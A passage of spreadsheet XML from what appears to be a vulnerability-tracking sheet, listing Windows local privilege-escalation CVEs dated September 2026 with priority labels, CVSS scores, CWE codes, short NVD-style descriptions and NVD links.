      </c>
      <c r="L817" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Camera Frame Server Monitor allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M817" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69542</t>
        </is>
      </c>
    </row>
    <row r="818">
      <c r="A818" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B818" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69544</t>
        </is>
      </c>
      <c r="C818" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D818" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E818" s="5" t="inlineStr"/>
      <c r="F818" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G818" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H818" s="5" t="inlineStr"/>
      <c r="I818" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J818" s="5" t="inlineStr"/>
      <c r="K818" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L818" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows SMB Client allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M818" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69544</t>
        </is>
      </c>
    </row>
    <row r="819">
      <c r="A819" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B819" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69561</t>
        </is>
      </c>
      <c r="C819" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D819" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E819" s="5" t="inlineStr"/>
      <c r="F819" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G819" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H819" s="5" t="inlineStr"/>
      <c r="I819" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J819" s="5" t="inlineStr"/>
      <c r="K819" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L819" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows CD-ROM Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M819" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69561</t>
        </is>
      </c>
    </row>
    <row r="820">
      <c r="A820" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B820" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69571</t>
        </is>
      </c>
      <c r="C820" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D820" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E820" s="5" t="inlineStr"/>
      <c r="F820" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G820" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H820" s="5" t="inlineStr"/>
      <c r="I820" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J820" s="5" t="inlineStr"/>
      <c r="K820" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L820" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows USB Audio Class driver (usbaudio.sys) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M820" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69571</t>
        </is>
      </c>
    </row>
    <row r="821">
      <c r="A821" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B821" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69580</t>
        </is>
      </c>
      <c r="C821" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D821" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E821" s="5" t="inlineStr"/>
      <c r="F821" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G821" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H82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821" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J821" s="5" t="inlineStr"/>
      <c r="K821" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L821" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M821" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69580</t>
        </is>
      </c>
    </row>
    <row r="822">
      <c r="A822" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B822" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69582</t>
        </is>
      </c>
      <c r="C822" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D822" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E822" s="5" t="inlineStr"/>
      <c r="F822" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G822" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H822" s="5" t="inlineStr"/>
      <c r="I822" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J822" s="5" t="inlineStr"/>
      <c r="K822" s="5" t="inlineStr">
        <is>
          <t>CWE-126</t>
        </is>
      </c>
      <c r="L822" s="5" t="inlineStr">
        <is>
          <t>Buffer over-read in Windows Volume Manager Extension Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M822" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69582</t>
        </is>
      </c>
    </row>
    <row r="823">
      <c r="A823" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B823" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69583</t>
        </is>
      </c>
      <c r="C823" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D823" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E823" s="5" t="inlineStr"/>
      <c r="F823" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G823" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H823" s="5" t="inlineStr"/>
      <c r="I823" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J823" s="5" t="inlineStr"/>
      <c r="K823" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L823" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M823" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69583</t>
        </is>
      </c>
    </row>
    <row r="824">
      <c r="A824" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B824" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69584</t>
        </is>
      </c>
      <c r="C824" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D824" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E824" s="5" t="inlineStr"/>
      <c r="F824" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G824" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H824" s="5" t="inlineStr"/>
      <c r="I824" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J824" s="5" t="inlineStr"/>
      <c r="K824" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L824" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows USB Video Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M824" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69584</t>
        </is>
      </c>
    </row>
    <row r="825">
      <c r="A825" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B825" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69585</t>
        </is>
      </c>
      <c r="C825" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D825" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E825" s="5" t="inlineStr"/>
      <c r="F825" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G825" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H825" s="5" t="inlineStr"/>
      <c r="I825" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J825" s="5" t="inlineStr"/>
      <c r="K825" s="5" t="inlineStr">
        <is>
          <t>CWE-704</t>
        </is>
      </c>
      <c r="L825" s="5" t="inlineStr">
        <is>
          <t>Incorrect type conversion or cast in Microsoft Windows Search Component allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M825" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69585</t>
        </is>
      </c>
    </row>
    <row r="826">
      <c r="A826" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B826" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69589</t>
        </is>
      </c>
      <c r="C826" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D826" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E826" s="5" t="inlineStr"/>
      <c r="F826" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G826" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H826" s="5" t="inlineStr"/>
      <c r="I826" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J826" s="5" t="inlineStr"/>
      <c r="K826" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L826" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M826" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69589</t>
        </is>
      </c>
    </row>
    <row r="827">
      <c r="A827" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B827" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69592</t>
        </is>
      </c>
      <c r="C827" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D827" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E827" s="5" t="inlineStr"/>
      <c r="F827" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G827" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H827" s="5" t="inlineStr"/>
      <c r="I827" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J827" s="5" t="inlineStr"/>
      <c r="K827" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L827" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Universal Disk Format File System Driver (UDFS) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M827" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69592</t>
        </is>
      </c>
    </row>
    <row r="828">
      <c r="A828" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B828" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69593</t>
        </is>
      </c>
      <c r="C828" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D828" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E828" s="5" t="inlineStr"/>
      <c r="F828" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G828" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H828" s="5" t="inlineStr"/>
      <c r="I828" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J828" s="5" t="inlineStr"/>
      <c r="K828" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L828" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M828" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69593</t>
        </is>
      </c>
    </row>
    <row r="829">
      <c r="A829" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B829" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69594</t>
        </is>
      </c>
      <c r="C829" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D829" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E829" s="5" t="inlineStr"/>
      <c r="F829" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G829" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H829" s="5" t="inlineStr"/>
      <c r="I829" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J829" s="5" t="inlineStr"/>
      <c r="K829" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="L829" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Local Security Authority Server (lsasrv) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M829" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69594</t>
        </is>
      </c>
    </row>
    <row r="830">
      <c r="A830" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B830" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69604</t>
        </is>
      </c>
      <c r="C830" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D830" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E830" s="5" t="inlineStr"/>
      <c r="F830" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G830" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H830" s="5" t="inlineStr"/>
      <c r="I830" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J830" s="5" t="inlineStr"/>
      <c r="K830" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L830" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Audio Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M830" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69604</t>
        </is>
      </c>
    </row>
    <row r="831">
      <c r="A831" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B831" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69608</t>
        </is>
      </c>
      <c r="C831" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D831" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E831" s="5" t="inlineStr"/>
      <c r="F831" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G831" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H831" s="5" t="inlineStr"/>
      <c r="I831" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J831" s="5" t="inlineStr"/>
      <c r="K831" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L831" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Microsoft Windows Search Component allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M831" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69608</t>
        </is>
      </c>
    </row>
    <row r="832">
      <c r="A832" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B832" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69612</t>
        </is>
      </c>
      <c r="C832" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D832" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E832" s="5" t="inlineStr"/>
      <c r="F832" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G832" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H832" s="5" t="inlineStr"/>
      <c r="I832" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J832" s="5" t="inlineStr"/>
      <c r="K832" s="5" t="inlineStr">
        <is>
          <t>CWE-36</t>
        </is>
      </c>
      <c r="L832" s="5" t="inlineStr">
        <is>
          <t>Absolute path traversal in Windows Error Reporting allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M832" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69612</t>
        </is>
      </c>
    </row>
    <row r="833">
      <c r="A833" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B833" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69685</t>
        </is>
      </c>
      <c r="C833" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D833" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E833" s="5" t="inlineStr"/>
      <c r="F833" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G833" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H833" s="5" t="inlineStr"/>
      <c r="I833" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J833" s="5" t="inlineStr"/>
      <c r="K833" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L833" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Kerberos allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M833" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69685</t>
        </is>
      </c>
    </row>
    <row r="834">
      <c r="A834" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B834" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69687</t>
        </is>
      </c>
      <c r="C834" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D834" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E834" s="5" t="inlineStr"/>
      <c r="F834" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G834" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H834" s="5" t="inlineStr"/>
      <c r="I834" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J834" s="5" t="inlineStr"/>
      <c r="K834" s="5" t="inlineStr">
        <is>
          <t>CWE-191</t>
        </is>
      </c>
      <c r="L834" s="5" t="inlineStr">
        <is>
          <t>Integer underflow (wrap or wraparound) in Windows USB Audio Class driver (usbaudio.sys) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M834" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69687</t>
        </is>
      </c>
    </row>
    <row r="835">
      <c r="A835" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B835" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69691</t>
        </is>
      </c>
      <c r="C835" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D835" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E835" s="5" t="inlineStr"/>
      <c r="F835" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G835" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H835" s="5" t="inlineStr"/>
      <c r="I835" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J835" s="5" t="inlineStr"/>
      <c r="K835" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L835" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Spaceport.sys allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M835" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69691</t>
        </is>
      </c>
    </row>
    <row r="836">
      <c r="A836" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B836" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69707</t>
        </is>
      </c>
      <c r="C836" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D836" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E836" s="5" t="inlineStr"/>
      <c r="F836" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G836" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H836" s="5" t="inlineStr"/>
      <c r="I836" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J836" s="5" t="inlineStr"/>
      <c r="K836" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L836" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows USB Audio Class driver (usbaudio.sys) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M836" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69707</t>
        </is>
      </c>
    </row>
    <row r="837">
      <c r="A837" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B837" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69709</t>
        </is>
      </c>
      <c r="C837" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D837" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E837" s="5" t="inlineStr"/>
      <c r="F837" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G837" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H837" s="5" t="inlineStr"/>
      <c r="I837" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J837" s="5" t="inlineStr"/>
      <c r="K837" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L837" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="M837" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69709</t>
        </is>
      </c>
    </row>
    <row r="838">
      <c r="A838" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B838" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69720</t>
        </is>
      </c>
      <c r="C838" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D838" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E838" s="5" t="inlineStr"/>
      <c r="F838" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G838" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H838" s="5" t="inlineStr"/>
      <c r="I838" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J838" s="5" t="inlineStr"/>
      <c r="K838" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L838" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows MIDI Service Module allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M838" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69720</t>
        </is>
      </c>
    </row>
    <row r="839">
      <c r="A839" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B839" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69725</t>
        </is>
      </c>
      <c r="C839" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D839" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E839" s="5" t="inlineStr"/>
      <c r="F839" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G839" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H839" s="5" t="inlineStr"/>
      <c r="I839" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J839" s="5" t="inlineStr"/>
      <c r="K839" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="L839" s="5" t="inlineStr">
        <is>
          <t>Double free in Windows Hello allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M839" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69725</t>
        </is>
      </c>
    </row>
    <row r="840">
      <c r="A840" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B840" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69738</t>
        </is>
      </c>
      <c r="C840" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D840" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E840" s="5" t="inlineStr"/>
      <c r="F840" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G840" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H840" s="5" t="inlineStr"/>
      <c r="I840" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J840" s="5" t="inlineStr"/>
      <c r="K840" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="L840" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M840" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69738</t>
        </is>
      </c>
    </row>
    <row r="841">
      <c r="A841" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B841" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69758</t>
        </is>
      </c>
      <c r="C841" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D841" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E841" s="5" t="inlineStr"/>
      <c r="F841" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G841" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H841" s="5" t="inlineStr"/>
      <c r="I841" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J841" s="5" t="inlineStr"/>
      <c r="K841" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L841" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Universal Disk Format File System Driver (UDFS) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M841" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69758</t>
        </is>
      </c>
    </row>
    <row r="842">
      <c r="A842" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B842" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69785</t>
        </is>
      </c>
      <c r="C842" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D842" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E842" s="5" t="inlineStr"/>
      <c r="F842" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G842" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H842" s="5" t="inlineStr"/>
      <c r="I842" s="5" t="inlineStr">
        <is>
